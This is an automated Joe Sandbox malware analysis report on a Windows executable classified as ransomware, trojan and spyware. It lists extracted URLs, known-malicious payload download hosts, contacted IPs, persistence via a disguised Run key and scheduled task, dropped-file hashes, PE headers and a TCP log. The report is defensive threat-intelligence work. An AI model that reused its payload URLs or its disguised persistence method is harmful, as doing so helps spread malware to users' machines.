http://aka.ms/rmssdk)	U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.youtube.com/	U59WtZz2Sg.exe, 00000005.00000003.351612553.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE6B7572D	U59WtZz2Sg.exe, 00000005.00000003.420123871.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=02Google	U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.qt.io/terms-conditions.	U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.openssl.org/)	U59WtZz2Sg.exe, 00000005.00000003.408637409.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.inkscape.org/namespaces/inkscape	U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/	U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.qt.io/licensing/	U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/installwebapp?usp=chrome_default	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.google.com/drive/installwebapp?usp=chrome_default	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png	U59WtZz2Sg.exe, 00000005.00000003.444451772.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.amazon.com/	U59WtZz2Sg.exe, 00000005.00000003.349908003.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/B	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/installwebapp?usp=chrome_default	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://sandbox.google.com/payments/v4/js/integrator.js	U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.twitter.com/	U59WtZz2Sg.exe, 00000005.00000003.350997403.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/:	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/installwebapp?usp=chrome_default	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.html	U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	U59WtZz2Sg.exe, 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://docs.google.com/spreadsheets/?usp=installed_webapp	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e	U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/B	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://aka.ms/sia	U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://fresherlights.com/files/1/build3.exe$run	U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://docs.google.com/spreadsheets/:	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.freetype.org	U59WtZz2Sg.exe, 00000005.00000003.408637409.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0	U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://uaery.top/dl/build2.exerunk6	U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://facebook.github.io/react/docs/error-decoder.html?invariant	U59WtZz2Sg.exe, 00000005.00000003.536209004.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.536117643.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.nytimes.com/	U59WtZz2Sg.exe, 00000005.00000003.350793064.0000000003060000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.google.com/:	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/	U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aka.ms/rmsfaq)	U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=	U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt	U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/Vh5j3k	U59WtZz2Sg.exe, 00000005.00000003.457247775.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://creativecommons.org/ns#	U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
116.121.62.237	uaery.top	Korea Republic of	9578	CJNET-ASCheiljedangCoIncKR	true
88.198.94.71	unknown	Germany	24940	HETZNER-ASDE	false
162.0.217.254	api.2ip.ua	Canada	35893	ACPCA	false
222.236.49.123	fresherlights.com	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756302
Start date and time:	2022-11-30 00:21:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 39s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	U59WtZz2Sg.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@32/1330@8/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 93.5% (good quality ratio 87.2%) Quality average: 80.4% Quality standard deviation: 29.9%
HCA Information:	Successful, ratio: 93% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, conhost.exe, svchost.exe
TCP Packets have been reduced to 100
Created / dropped Files have been reduced to 100
Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:22:11	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe s>--Task
00:22:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
00:22:18	API Interceptor	1x Sleep call for process: U59WtZz2Sg.exe modified
00:22:24	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
00:22:28	Task Scheduler	Run new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Process:	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.287139506398081
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
MD5:	292F98D765C8712910776C89ADDE2311
SHA1:	E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
SHA-256:	9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
SHA-512:	205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.8208888513501895
Encrypted:	false
SSDEEP:	3:cRJ1x6qwZdUmnIQdOX:cHGxnti
MD5:	53BC8AA5E48C1DA5C959E645EBD3BF0B
SHA1:	1425194A71023EB54098B76F5DE96C89D06CBFA3
SHA-256:	8D177185C26DB03DA48D7944B355DAAEC9FA251A377401DE195F7520FFE84B53
SHA-512:	DEC60480AEABE911DFA29F92C37ED8A3E89342A8A34834FE96B97DEF47A3A4633897AA65D5A93033DEAD54E504B5204EC4031ACCF6D4C09C63A560BF6EA0FC30
Malicious:	false
Preview:	K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS..

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.904357034984543
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	U59WtZz2Sg.exe
File size:	680448
MD5:	41001fdd7879ce9ede214e92c7e492be
SHA1:	215964b0399da37b41b7f420806a72feb72a7c28
SHA256:	aaef58ede9edbfc0cbbdd3dc7abfa9ae0f977ed1b33af4f5d7665123187801d1
SHA512:	1d125890b19e323fd3a67b3b2575c97df72f4f8b7f13d5e1d3e010063b88cc40a6f55d25513ada752992434f0b1d350152798381d43cb2ec591020c85eec44d9
SSDEEP:	12288:Q2lMqUe8G9qSkYuZpeKF8GJF6y9NbgGUx0kXZPwtSRGG/t6i5l5kCYlS:Q2K98cT3d9V3U/XZPwYRGQ6i5l5k5l
TLSH:	CEE423217A90D073C887557079228662773F757328FE8C87BF5198E51EB22C67A1A38F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.'.5.I.5.I.5.I.....4.I.+...$.I.+...].I..]2.2.I.5.H...I.+.....I.+...4.I.+...4.I.Rich5.I.................PE..L.....Ib...........

Entrypoint:	0x404c97
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6249E282 [Sun Apr 3 18:08:02 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	2ac0f7085258eff31142b9f87cb0f218

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10a9c	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd8000	0x3050	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1280	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2cd8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x23c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x107d4	0x10800	False	0.5117039535984849	data	6.09735691865179	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x12000	0xc5c68	0x92400	False	0.9938334668803419	data	7.994721199860208	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd8000	0x3050	0x3200	False	0.629140625	data	5.666597605339273	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country
JEBOPOZUSUHARAFA	0xda430	0x55f	ASCII text, with very long lines (1375), with no line terminators	Raeto-Romance	Switzerland
RT_ICON	0xd82b0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Raeto-Romance	Switzerland
RT_ICON	0xd8978	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Raeto-Romance	Switzerland
RT_ICON	0xd8ee0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Raeto-Romance	Switzerland
RT_ICON	0xd9f88	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Raeto-Romance	Switzerland
RT_STRING	0xdab78	0x2d8	data	Raeto-Romance	Switzerland
RT_STRING	0xdae50	0x1fc	data	Raeto-Romance	Switzerland
RT_ACCELERATOR	0xda990	0xa0	data	Raeto-Romance	Switzerland
RT_GROUP_ICON	0xda3f0	0x3e	data	Raeto-Romance	Switzerland
RT_VERSION	0xdaa30	0x148	x86 executable not stripped

DLL	Import
KERNEL32.dll	OpenMutexW, GetConsoleAliasExesLengthA, CopyFileExA, ReadConsoleOutputCharacterW, CompareStringW, SetVolumeLabelA, FillConsoleOutputAttribute, GetConsoleTitleA, QueryDosDeviceW, EnumCalendarInfoExA, GetProcessPriorityBoost, IsProcessInJob, AddConsoleAliasW, CreateFileW, SetMailslotInfo, GetWindowsDirectoryW, GetModuleHandleA, GlobalLock, CreateDirectoryExW, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, OpenWaitableTimerA, GetVersionExA, SearchPathA, MoveFileExW, CallNamedPipeW, GetCurrentDirectoryW, GetDriveTypeA, CreateMailslotA, BuildCommDCBAndTimeoutsA, GetProcAddress, LoadLibraryA, LocalAlloc, GetBinaryTypeA, GetCPInfoExW, WriteConsoleOutputA, GetCommandLineA, EnumDateFormatsW, CancelTimerQueueTimer, GetHandleInformation, FindResourceA, CreateJobObjectA, FindFirstVolumeA, GlobalFlags, CreateNamedPipeW, InterlockedIncrement, CloseHandle, CopyFileW, GetComputerNameExA, GetShortPathNameA, FlushFileBuffers, GetLogicalDriveStringsW, InterlockedCompareExchange, EnumCalendarInfoW, GetConsoleAliasExesLengthW, InterlockedExchange, GetNamedPipeHandleStateW, GetModuleHandleW, GetCurrentActCtx, GenerateConsoleCtrlEvent, MoveFileW, AddAtomA, SetThreadPriority, FreeEnvironmentStringsW, SetConsoleTitleW, SetVolumeMountPointW, VirtualAlloc, _hread, EnumResourceLanguagesW, ClearCommBreak, QueryMemoryResourceNotification, GlobalFindAtomA, HeapWalk, SetFilePointer, GetTickCount, EnumSystemCodePagesW, VerifyVersionInfoA, LoadLibraryW, CreateFileA, GetLastError, WideCharToMultiByte, HeapReAlloc, HeapAlloc, HeapFree, UnhandledExceptionFilter, SetUnhandledExceptionFilter, DeleteFileA, GetStartupInfoA, GetCPInfo, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, RtlUnwind, InitializeCriticalSectionAndSpinCount, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, HeapSize, ReadFile
GDI32.dll	GetCharWidthA, GetCharABCWidthsA
WINHTTP.dll	WinHttpSetOption

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2022 00:22:09.435889959 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.435945988 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.436464071 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.469263077 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.469322920 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.546952009 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.547126055 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.898497105 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.898566008 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.899504900 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.899597883 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.902540922 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.902566910 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.943552017 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.943653107 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:09.943658113 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:09.943805933 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:10.054886103 CET	49702	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:10.054929018 CET	443	49702	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.200620890 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.200680017 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.200789928 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.245260000 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.245289087 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.312412024 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.312542915 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.346792936 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.346860886 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.347371101 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.347579002 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.350308895 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.350330114 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.396068096 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.396161079 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.396238089 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.455621004 CET	49703	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:16.455662966 CET	443	49703	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:16.704987049 CET	49704	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:16.841957092 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:16.997359991 CET	80	49704	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:16.997529984 CET	49704	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:17.013473988 CET	49704	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:17.136807919 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:17.137012005 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:17.137850046 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:17.506212950 CET	80	49704	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:17.635873079 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.131397963 CET	80	49704	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:18.131433964 CET	80	49704	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:18.131561995 CET	49704	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:18.131875038 CET	49704	80	192.168.2.5	222.236.49.123
Nov 30, 2022 00:22:18.425659895 CET	80	49704	222.236.49.123	192.168.2.5
Nov 30, 2022 00:22:18.428991079 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.429039001 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.429260015 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:18.725884914 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.725986004 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.726016998 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:18.726057053 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.726106882 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:18.726135015 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:18.726202011 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:18.726202011 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.020948887 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.021039009 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.021250963 CET	49705	80	192.168.2.5	116.121.62.237
